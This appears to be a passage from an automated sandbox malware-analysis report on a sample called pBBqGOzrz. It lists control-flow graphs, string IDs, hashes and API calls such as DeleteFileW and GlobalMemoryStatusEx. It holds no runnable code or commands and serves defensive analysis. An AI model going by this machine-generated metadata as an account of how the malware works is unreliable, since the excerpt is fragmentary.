                                        control_flow_graph 0 708ade0-708adfe 1 708ae00-708ae03 0->1 2 708ae05-708ae21 1->2 3 708ae26-708ae29 1->3 2->3 4 708affd-708b006 3->4 5 708ae2f-708ae32 3->5 6 708ae89-708ae92 4->6 7 708b00c-708b016 4->7 9 708ae34-708ae41 5->9 10 708ae46-708ae49 5->10 13 708ae98-708ae9c 6->13 14 708b017-708b04e 6->14 9->10 11 708ae5a-708ae5d 10->11 12 708ae4b-708ae4f 10->12 17 708ae5f-708ae64 11->17 18 708ae67-708ae6a 11->18 12->7 16 708ae55 12->16 20 708aea1-708aea4 13->20 28 708b050-708b053 14->28 16->11 17->18 22 708ae6c-708ae7f 18->22 23 708ae84-708ae87 18->23 24 708aeb4-708aeb6 20->24 25 708aea6-708aeaf 20->25 22->23 23->6 23->20 26 708aeb8 24->26 27 708aebd-708aec0 24->27 25->24 26->27 27->1 29 708aec6-708aeea 27->29 30 708b055-708b071 28->30 31 708b076-708b079 28->31 48 708affa 29->48 49 708aef0-708aeff 29->49 30->31 33 708b088-708b08b 31->33 34 708b07b call 708b343 31->34 35 708b098-708b09b 33->35 36 708b08d-708b091 33->36 42 708b081-708b083 34->42 39 708b0a1-708b0dc 35->39 41 708b304-708b307 35->41 36->39 40 708b093 36->40 52 708b2cf-708b2e2 39->52 53 708b0e2-708b0ee 39->53 40->35 44 708b309-708b313 41->44 45 708b314-708b316 41->45 42->33 50 708b318 45->50 51 708b31d-708b320 45->51 48->4 57 708af01-708af07 49->57 58 708af17-708af52 call 70866b0 49->58 50->51 51->28 54 708b326-708b330 51->54 55 708b2e4 52->55 63 708b10e-708b152 53->63 64 708b0f0-708b109 53->64 60 708b2e5 55->60 61 708af09 57->61 62 708af0b-708af0d 57->62 76 708af6a-708af81 58->76 77 708af54-708af5a 58->77 60->60 61->58 62->58 78 708b16e-708b1ad 63->78 79 708b154-708b166 63->79 64->55 90 708af99-708afaa 76->90 91 708af83-708af89 76->91 80 708af5c 77->80 81 708af5e-708af60 77->81 85 708b1b3-708b28e call 70866b0 78->85 86 708b294-708b2a9 78->86 79->78 80->76 81->76 85->86 86->52 98 708afac-708afb2 90->98 99 708afc2-708aff3 90->99 93 708af8b 91->93 94 708af8d-708af8f 91->94 93->90 94->90 100 708afb4 98->100 101 708afb6-708afb8 98->101 99->48 100->99 101->99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-3823777903
                                        • Opcode ID: d730d59e5e98f4a450943b171cdcacfcf2929929ed9931822b799c9ddfc069ad
                                        • Instruction ID: 0ec5ddadeafb05253e307bbd9a6818d85a78e3347d1e0ee6a39392b85f575e48
                                        • Opcode Fuzzy Hash: d730d59e5e98f4a450943b171cdcacfcf2929929ed9931822b799c9ddfc069ad
                                        • Instruction Fuzzy Hash: 74E14EB0B0020A8FCB65EFA8D4806AEB7F2FF85314F10862AD455DB355DB35DC4A8B91
                                        Function 0708B760 Relevance: 8.0, Strings: 6, Instructions: 473COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: b2a1898c8f233d1eb48e714992ad33a02a7d4ccb44fa85f1dcc7ce75951e39df
                                        • Instruction ID: d39073f66040310b55ca9f49f5591d1be98472577d8cabbe7e5a5bb7387f522c
                                        • Opcode Fuzzy Hash: b2a1898c8f233d1eb48e714992ad33a02a7d4ccb44fa85f1dcc7ce75951e39df
                                        • Instruction Fuzzy Hash: F6026BB0A0020A8FDBA4EF68D4806ADB7F2FF45310F24866AD495DB355DB75DC85CB81
                                        Function 07089260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 426 7089260-7089285 427 7089287-708928a 426->427 428 708928c-70892ab 427->428 429 70892b0-70892b3 427->429 428->429 430 70892b9-70892ce 429->430 431 7089b73-7089b75 429->431 438 70892d0-70892d6 430->438 439 70892e6-70892fc 430->439 433 7089b7c-7089b7f 431->433 434 7089b77 431->434 433->427 435 7089b85-7089b8f 433->435 434->433 440 70892d8 438->440 441 70892da-70892dc 438->441 443 7089307-7089309 439->443 440->439 441->439 444 708930b-7089311 443->444 445 7089321-7089392 443->445 446 7089313 444->446 447 7089315-7089317 444->447 456 70893be-70893da 445->456 457 7089394-70893b7 445->457 446->445 447->445 462 70893dc-70893ff 456->462 463 7089406-7089421 456->463 457->456 462->463 468 708944c-7089467 463->468 469 7089423-7089445 463->469 474 7089469-708948b 468->474 475 7089492-708949c 468->475 469->468 474->475 476 70894ac-7089526 475->476 477 708949e-70894a7 475->477 483 7089528-7089546 476->483 484 7089573-7089588 476->484 477->435 488 7089548-7089557 483->488 489 7089562-7089571 483->489 484->431 488->489 489->483 489->484
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: c1c26dc4886cfca812af4fb0a931f5603dea169509b7cf1eb096c7887f85b7ec
                                        • Instruction ID: cc13f2b5b335fc736ada1421ed256295d66cd5562ba450ac6fedb719b92c785d
                                        • Opcode Fuzzy Hash: c1c26dc4886cfca812af4fb0a931f5603dea169509b7cf1eb096c7887f85b7ec
                                        • Instruction Fuzzy Hash: 07916E70B1020A9FDB94EB69D9507AEB3F6FBC9204F108569C40DEB354EE70EC468B91
                                        Function 0708D068 Relevance: 4.6, Strings: 3, Instructions: 801COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 492 708d068-708d083 493 708d085-708d088 492->493 494 708d08a-708d099 493->494 495 708d0d1-708d0d4 493->495 496 708d0a8-708d0b4 494->496 497 708d09b-708d0a0 494->497 498 708d11d-708d120 495->498 499 708d0d6-708d118 495->499 500 708d0ba-708d0cc 496->500 501 708da85-708dabe 496->501 497->496 502 708d12f-708d132 498->502 503 708d122-708d124 498->503 499->498 500->495 514 708dac0-708dac3 501->514 507 708d13c-708d13f 502->507 508 708d134-708d139 502->508 505 708d12a 503->505 506 708d551 503->506 505->502 509 708d554-708d560 506->509 511 708d188-708d18b 507->511 512 708d141-708d183 507->512 508->507 509->494 516 708d566-708d853 509->516 517 708d18d-708d1cf 511->517 518 708d1d4-708d1d7 511->518 512->511 520 708dac5-708dae1 514->520 521 708dae6-708dae9 514->521 705 708d859-708d85f 516->705 706 708da7a-708da84 516->706 517->518 522 708d1d9-708d21b 518->522 523 708d220-708d223 518->523 520->521 527 708daeb-708db17 521->527 528 708db1c-708db1f 521->528 522->523 524 708d26c-708d26f 523->524 525 708d225-708d267 523->525 536 708d2b8-708d2bb 524->536 537 708d271-708d280 524->537 525->524 527->528 533 708db2e-708db30 528->533 534 708db21 call 708dbdd 528->534 545 708db32 533->545 546 708db37-708db3a 533->546 554 708db27-708db29 534->554 542 708d2ca-708d2cd 536->542 543 708d2bd-708d2bf 536->543 538 708d28f-708d29b 537->538 539 708d282-708d287 537->539 538->501 548 708d2a1-708d2b3 538->548 539->538 552 708d2ea-708d2ed 542->552 553 708d2cf-708d2e5 542->553 550 708d40f-708d418 543->550 551 708d2c5 543->551 545->546 546->514 556 708db3c-708db4b 546->556 548->536 564 708d41a-708d41f 550->564 565 708d427-708d433 550->565 551->542 561 708d2ef-708d331 552->561 562 708d336-708d339 552->562 553->552 554->533 579 708db4d-708dbb0 call 70866b0 556->579 580 708dbb2-708dbc7 556->580 561->562 573 708d33b-708d357 562->573 574 708d35c-708d35f 562->574 564->565 566 708d439-708d44d 565->566 567 708d544-708d549 565->567 566->506 591 708d453-708d465 566->591 567->506 573->574 574->509 575 708d365-708d368 574->575 584 708d36a-708d3ac 575->584 585 708d3b1-708d3b4 575->585 579->580 601 708dbc8 580->601 584->585 593 708d3fd-708d3ff 585->593 594 708d3b6-708d3f8 585->594 612 708d489-708d48b 591->612 613 708d467-708d46d 591->613 604 708d401 593->604 605 708d406-708d409 593->605 594->593 601->601 604->605 605->493 605->550 615 708d495-708d4a1 612->615 616 708d46f 613->616 617 708d471-708d47d 613->617 632 708d4af 615->632 633 708d4a3-708d4ad 615->633 622 708d47f-708d487 616->622 617->622 622->615 634 708d4b4-708d4b6 632->634 633->634 634->506 639 708d4bc-708d4d8 call 70866b0 634->639 650 708d4da-708d4df 639->650 651 708d4e7-708d4f3 639->651 650->651 651->567 652 708d4f5-708d542 651->652 652->506 707 708d86e-708d877 705->707 708 708d861-708d866 705->708 707->501 709 708d87d-708d890 707->709 708->707 711 708da6a-708da74 709->711 712 708d896-708d89c 709->712 711->705 711->706 713 708d8ab-708d8b4 712->713 714 708d89e-708d8a3 712->714 713->501 715 708d8ba-708d8db 713->715 714->713 718 708d8ea-708d8f3 715->718 719 708d8dd-708d8e2 715->719 718->501 720 708d8f9-708d916 718->720 719->718 720->711 723 708d91c-708d922 720->723 723->501 724 708d928-708d941 723->724 726 708da5d-708da64 724->726 727 708d947-708d96e 724->727 726->711 726->723 727->501 730 708d974-708d97e 727->730 730->501 731 708d984-708d99b 730->731 733 708d9aa-708d9c5 731->733 734 708d99d-708d9a8 731->734 733->726 739 708d9cb-708d9e4 call 70866b0 733->739 734->733 743 708d9f3-708d9fc 739->743 744 708d9e6-708d9eb 739->744 743->501 745 708da02-708da56 743->745 744->743 745->726
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457
                                        • Opcode ID: 361c44b65fc03a39a187b8a54655bd0ba6eb650f68bcf997ec1449f59fcad766
                                        • Instruction ID: 17d72d73c8500c0b16251bcbaaa1336d7e976069d7ba13c7e110c4bcfbc917e3
                                        • Opcode Fuzzy Hash: 361c44b65fc03a39a187b8a54655bd0ba6eb650f68bcf997ec1449f59fcad766
                                        • Instruction Fuzzy Hash: B4624C7070020A8FCB55EF68D580A5EB7F2FF84304B248A69D4499F369DB75ED4ACB81
                                        Function 07084C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 753 7084c78-7084c9c 754 7084c9e-7084ca1 753->754 755 7084cc2-7084cc5 754->755 756 7084ca3-7084cbd 754->756 757 7084ccb-7084dc3 755->757 758 70853a4-70853a6 755->758 756->755 776 7084dc9-7084e16 call 7085523 757->776 777 7084e46-7084e4d 757->777 760 70853a8 758->760 761 70853ad-70853b0 758->761 760->761 761->754 762 70853b6-70853c3 761->762 790 7084e1c-7084e38 776->790 778 7084ed1-7084eda 777->778 779 7084e53-7084ec3 777->779 778->762 796 7084ece 779->796 797 7084ec5 779->797 793 7084e3a 790->793 794 7084e43-7084e44 790->794 793->794 794->777 796->778 797->796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020
                                        • Opcode ID: 1b7995c6a3b50cc1ff171d6ac6dda46692ec2f41ca228e325ed809235206205a
                                        • Instruction ID: c0b6cda9b689e48a1ad76e31ef7a14ba8ea253d501ee9354be458e4836af98a0
                                        • Opcode Fuzzy Hash: 1b7995c6a3b50cc1ff171d6ac6dda46692ec2f41ca228e325ed809235206205a
                                        • Instruction Fuzzy Hash: 02619370F002199FDB54AFA8C8547AEBBF6FF88300F20852AE549EB394DB754D458B91
                                        Function 07089253 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1569 7089253-708925a 1570 708925b-708925c 1569->1570 1570->1570 1571 708925e-7089285 1570->1571 1572 7089287-708928a 1571->1572 1573 708928c-70892ab 1572->1573 1574 70892b0-70892b3 1572->1574 1573->1574 1575 70892b9-70892ce 1574->1575 1576 7089b73-7089b75 1574->1576 1583 70892d0-70892d6 1575->1583 1584 70892e6-70892fc 1575->1584 1578 7089b7c-7089b7f 1576->1578 1579 7089b77 1576->1579 1578->1572 1580 7089b85-7089b8f 1578->1580 1579->1578 1585 70892d8 1583->1585 1586 70892da-70892dc 1583->1586 1588 7089307-7089309 1584->1588 1585->1584 1586->1584 1589 708930b-7089311 1588->1589 1590 7089321-7089392 1588->1590 1591 7089313 1589->1591 1592 7089315-7089317 1589->1592 1601 70893be-70893da 1590->1601 1602 7089394-70893b7 1590->1602 1591->1590 1592->1590 1607 70893dc-70893ff 1601->1607 1608 7089406-7089421 1601->1608 1602->1601 1607->1608 1613 708944c-7089467 1608->1613 1614 7089423-7089445 1608->1614 1619 7089469-708948b 1613->1619 1620 7089492-708949c 1613->1620 1614->1613 1619->1620 1621 70894ac-7089526 1620->1621 1622 708949e-70894a7 1620->1622 1628 7089528-7089546 1621->1628 1629 7089573-7089588 1621->1629 1622->1580 1633 7089548-7089557 1628->1633 1634 7089562-7089571 1628->1634 1629->1576 1633->1634 1634->1628 1634->1629
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 388fcd8eed1a650a3a71571c01e5c1ce181ee62eced9b74c3c805ad6df4543d9
                                        • Instruction ID: 9a76547f1bf28092125e83594f95adeee64533e0138874a72b3ced6be66653bc
                                        • Opcode Fuzzy Hash: 388fcd8eed1a650a3a71571c01e5c1ce181ee62eced9b74c3c805ad6df4543d9
                                        • Instruction Fuzzy Hash: 98514170B101069FDB94EB78D990BAEB3F6EBC9208F148569C409DB394DE34EC468B95
                                        Function 07084C69 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1637 7084c69-7084c9c 1639 7084c9e-7084ca1 1637->1639 1640 7084cc2-7084cc5 1639->1640 1641 7084ca3-7084cbd 1639->1641 1642 7084ccb-7084dc3 1640->1642 1643 70853a4-70853a6 1640->1643 1641->1640 1661 7084dc9-7084e16 call 7085523 1642->1661 1662 7084e46-7084e4d 1642->1662 1645 70853a8 1643->1645 1646 70853ad-70853b0 1643->1646 1645->1646 1646->1639 1647 70853b6-70853c3 1646->1647 1675 7084e1c-7084e38 1661->1675 1663 7084ed1-7084eda 1662->1663 1664 7084e53-7084ec3 1662->1664 1663->1647 1681 7084ece 1664->1681 1682 7084ec5 1664->1682 1678 7084e3a 1675->1678 1679 7084e43-7084e44 1675->1679 1678->1679 1679->1662 1681->1663 1682->1681
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338
                                        • Opcode ID: 8a07b56174e931d70c6ce65943564f5f7456355c42632ebbd7c29e11d05c8527
                                        • Instruction ID: c3216a62cf39b920a29850523a93c22ce1cb17aeb24c7b9977b2c842b4f28665
                                        • Opcode Fuzzy Hash: 8a07b56174e931d70c6ce65943564f5f7456355c42632ebbd7c29e11d05c8527
                                        • Instruction Fuzzy Hash: F351A170B002099FDB559FB8C8547AEBBF6FF88700F20852AE145EB395DB758C058B91
                                        Function 018CEE90 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1867 18cee90-18ceeab 1868 18ceead-18ceed4 1867->1868 1869 18ceed5-18ceeeb 1867->1869 1889 18ceeed call 18cef78 1869->1889 1890 18ceeed call 18cee90 1869->1890 1872 18ceef2-18ceef4 1873 18ceefa-18cef59 1872->1873 1874 18ceef6-18ceef9 1872->1874 1881 18cef5f-18cefec GlobalMemoryStatusEx 1873->1881 1882 18cef5b-18cef5e 1873->1882 1885 18cefee-18ceff4 1881->1885 1886 18ceff5-18cf01d 1881->1886 1885->1886 1889->1872 1890->1872
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3c9698b6680beb716d44a7824c817a8d678b98af8e9587199c7c1f3ca35992e3
                                        • Instruction ID: 1bffca6faa1537f874912c7f04b9940fdd78a4e99d6860e47208f17f9ad153c1
                                        • Opcode Fuzzy Hash: 3c9698b6680beb716d44a7824c817a8d678b98af8e9587199c7c1f3ca35992e3
                                        • Instruction Fuzzy Hash: E6412372D043969FCB05DF79C80429ABFF1EF8A310F1485AAE549EB251DB349845CBD1
                                        Function 018C8038 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1891 18c8038-18c808a 1893 18c808c-18c808f 1891->1893 1894 18c8092-18c80bd DeleteFileW 1891->1894 1893->1894 1895 18c80bf-18c80c5 1894->1895 1896 18c80c6-18c80ee 1894->1896 1895->1896
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 018C80B0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: bcf5dd44b8d81373bac079aa2efcf97c72cf757016befdbf18cd69115f219882
                                        • Instruction ID: 3859ad44ddf8e8884d93287a04886d09b18d1a207de66e5329054888e03473a9
                                        • Opcode Fuzzy Hash: bcf5dd44b8d81373bac079aa2efcf97c72cf757016befdbf18cd69115f219882
                                        • Instruction Fuzzy Hash: 4B2138B1C006198FCB24CF99C4857DEFBB0FF48320F148169D858A7250D378A944CFA5
                                        Function 018C8040 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1899 18c8040-18c808a 1901 18c808c-18c808f 1899->1901 1902 18c8092-18c80bd DeleteFileW 1899->1902 1901->1902 1903 18c80bf-18c80c5 1902->1903 1904 18c80c6-18c80ee 1902->1904 1903->1904
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000), ref: 018C80B0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DeleteFile
                                        • String ID:
                                        • API String ID: 4033686569-0
                                        • Opcode ID: f2bf9054640171792696f9cc8a5586373f6f1be5953dc1be422e100f14f9ee44
                                        • Instruction ID: 1223ea7aa11486e0ba268527521f810755324d1c13dc7669d5f831a22282417f
                                        • Opcode Fuzzy Hash: f2bf9054640171792696f9cc8a5586373f6f1be5953dc1be422e100f14f9ee44
                                        • Instruction Fuzzy Hash: DC1136B1C006599BCB14CF9AC44479EFBB4BF48720F10812AD958A7250D378AA44CFA5
                                        Function 018CEF78 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1907 18cef78-18cefec GlobalMemoryStatusEx 1909 18cefee-18ceff4 1907->1909 1910 18ceff5-18cf01d 1907->1910 1909->1910
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 018CEFDF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4162175608.00000000018C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_18c0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 31d092a206fdf023ea887bf2d51e2c423827a7281bbcbe7962d6f65761d75d43
                                        • Instruction ID: a001f4e93e600630afb357e3d916f2fd10604802406158032de8974c34b5348b
                                        • Opcode Fuzzy Hash: 31d092a206fdf023ea887bf2d51e2c423827a7281bbcbe7962d6f65761d75d43
                                        • Instruction Fuzzy Hash: BB11E2B1C0066A9BDB10DF9AC544BDEFBF4AF48320F14816AE918A7250D778A944CFA5
                                        Function 0708DBDD Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1972 708dbdd-708dbe0 1973 708dbf0-708dc07 1972->1973 1974 708dbe2-708dbef 1972->1974 1975 708dc09-708dc0c 1973->1975 1974->1973 1976 708dc1b-708dc1e 1975->1976 1977 708dc0e 1975->1977 1978 708dc20-708dc4c 1976->1978 1979 708dc51-708dc54 1976->1979 1982 708dc14-708dc16 1977->1982 1978->1979 1980 708dc56-708dc72 1979->1980 1981 708dc77-708dc79 1979->1981 1980->1981 1983 708dc7b 1981->1983 1984 708dc80-708dc83 1981->1984 1982->1976 1983->1984 1984->1975 1986 708dc85-708dc94 1984->1986 1989 708de19-708de43 1986->1989 1990 708dc9a-708dcd3 1986->1990 1993 708de44 1989->1993 1997 708dd21-708dd45 1990->1997 1998 708dcd5-708dcdf 1990->1998 1993->1993 2006 708dd4f-708de13 1997->2006 2007 708dd47 1997->2007 2001 708dce1-708dce7 1998->2001 2002 708dcf7-708dd1f 1998->2002 2004 708dce9 2001->2004 2005 708dceb-708dced 2001->2005 2002->1997 2002->1998 2004->2002 2005->2002 2006->1989 2006->1990 2007->2006
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: e2cffffcd36568d0cf7e88d95395df8a15d940cea0e70b58e526282671d98d56
                                        • Instruction ID: 96f8cc460a0252aea69a82f688879e4529a64a6cba16761fa04cf89113975e81
                                        • Opcode Fuzzy Hash: e2cffffcd36568d0cf7e88d95395df8a15d940cea0e70b58e526282671d98d56
                                        • Instruction Fuzzy Hash: 0041B3B0B0030A9FDBA5EF65D45469EBBF2FF89304F104629D445DB280EB71D946CB91
                                        Function 070821D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PH^q
                                        • API String ID: 0-2549759414
                                        • Opcode ID: 7a207dd09eade4a08a29f25c4264632dedc3a59851bc6d48381b2bd145ddee85
                                        • Instruction ID: 06f9e53184751e049c727161240555ece0d82575e2c29a546d3338a65d91a370
                                        • Opcode Fuzzy Hash: 7a207dd09eade4a08a29f25c4264632dedc3a59851bc6d48381b2bd145ddee85
                                        • Instruction Fuzzy Hash: B531E470B002029FCB95AB78C55466E7BE2FF89310F244528D446DB394EE35DD46CBA2
                                        Function 0708A418 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: t
                                        • API String ID: 0-2238339752
                                        • Opcode ID: ecb66ceb71b66a1155fdc5c23c21166a20d761008a747160a43d692a6e89f50e
                                        • Instruction ID: dc3a6724bbe29f97c6478d74b3f21835b1ea816f7b2597234c4dadb8680d8d54
                                        • Opcode Fuzzy Hash: ecb66ceb71b66a1155fdc5c23c21166a20d761008a747160a43d692a6e89f50e
                                        • Instruction Fuzzy Hash: F901F5B07001155FCFA1EA7CA41472A77D9EBCA314F18962AE509CB360DA66DC468382
                                        Function 070883E0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 00e28a0ee6df465991ac06fefb9f194d81f883bfdd1efa4108bbb2c1a044a948
                                        • Instruction ID: 3a678d70f447b7b24e6605173b2e551003e17c54aa05d24c51df6cf109f85a05
                                        • Opcode Fuzzy Hash: 00e28a0ee6df465991ac06fefb9f194d81f883bfdd1efa4108bbb2c1a044a948
                                        • Instruction Fuzzy Hash: 08F0F4B26211028FDFE4AE98EA8066CB3A5FB41314F58D625C845CB2D0CBB5DD0AC752
                                        Function 07086580 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;
                                        • API String ID: 0-1661535913
                                        • Opcode ID: a2be01d242c183395fcbb5896777d24131ced8c2658e712cda46b80ad50d29df
                                        • Instruction ID: c313cc7b7d95e4c8090e1738c2cc76ad9745c1805a813a5c3b0610d638c3525d
                                        • Opcode Fuzzy Hash: a2be01d242c183395fcbb5896777d24131ced8c2658e712cda46b80ad50d29df
                                        • Instruction Fuzzy Hash: 79E068B0D05209AFCF60EE70980578B7BEC9702214F1147E6D844CB106E137CD018782
                                        Function 07084B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \Ocq
                                        • API String ID: 0-2995510325
                                        • Opcode ID: 5ba8871ff683b39d7d8a071a0c8f055b2b99bc4fcf3b4967eb1477b81966e876
                                        • Instruction ID: 56b688acd6f2778cd60a69770fb2cae05449e52a8b1651dbe5d8881e1b2a15eb
                                        • Opcode Fuzzy Hash: 5ba8871ff683b39d7d8a071a0c8f055b2b99bc4fcf3b4967eb1477b81966e876
                                        • Instruction Fuzzy Hash: 94F0DA70A1022ADBDB14DF94E899BAEBBB2FF88700F204219E402A7394CB741D05CB81
                                        Function 0708C2A8 Relevance: .6, Instructions: 640COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
